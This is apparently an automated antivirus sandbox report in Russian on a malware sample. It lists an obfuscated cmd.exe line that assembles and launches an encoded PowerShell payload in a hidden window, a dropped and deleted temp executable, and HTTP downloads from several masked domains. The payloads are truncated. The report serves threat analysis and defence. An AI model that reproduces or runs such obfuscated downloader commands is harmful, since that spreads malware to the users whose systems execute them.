Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V /C "set %iBJAocSjr%=hXaOhiJhj&&set %ibNddFbvR%=p^o^we^rs&&set %zbGGUIFbM%=VKCbjqFrt&&set %ljtiGsZuh%=he^ll&&set %YzJTkmPcz%=alBORwlwo&&!%ibNddFbvR%!!%ljtiGsZuh%! ^-^e LQBKAE8AaQBuACgAKAAgADM...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\60479.exe
Удаляет следующие файлы
- %TEMP%\60479.exe
Сетевая активность
Подключается к
- 'pu####odukties.nl':80
- 'br###e-loehr.de':80
- 'br###e-loehr.de':443
- 'bj#.de':80
- 'vi####am-gmbh.de':80
- 'wl##i.net':80
TCP
Запросы HTTP GET
- http://pu####odukties.nl/RMauWGgE/
- http://br###e-loehr.de/mkFRFHF/
- http://bj#.de/sUku/
- http://vi####am-gmbh.de/esohmhCZa/
- http://wl##i.net/NvoHkFXZe/
Другие
- 'br###e-loehr.de':443
UDP
- DNS ASK pu####odukties.nl
- DNS ASK br###e-loehr.de
- DNS ASK bj#.de
- DNS ASK vi####am-gmbh.de
- DNS ASK wl##i.net
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V /C "set %iBJAocSjr%=hXaOhiJhj&&set %ibNddFbvR%=p^o^we^rs&&set %zbGGUIFbM%=VKCbjqFrt&&set %ljtiGsZuh%=he^ll&&set %YzJTkmPcz%=alBORwlwo&&!%ibNddFbvR%!!%ljtiGsZuh%! ^-^e LQBKAE8AaQBuACgAKAAgADM...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LQBKAE8AaQBuACgAKAAgADMANgAgACwAIAAxADEAOQAsADEAMQA1ACAALAAgADkAOQAsADEAMQA0ACwAMQAwADUALAAxADEAMgAgACwAMQAxADYAIAAsADMAMgAsACAANgAxACwAMwAyACwAMQAxADAAIAAsACAAMQAwADEALAAxADEAOQAgACwAIAA0AD...
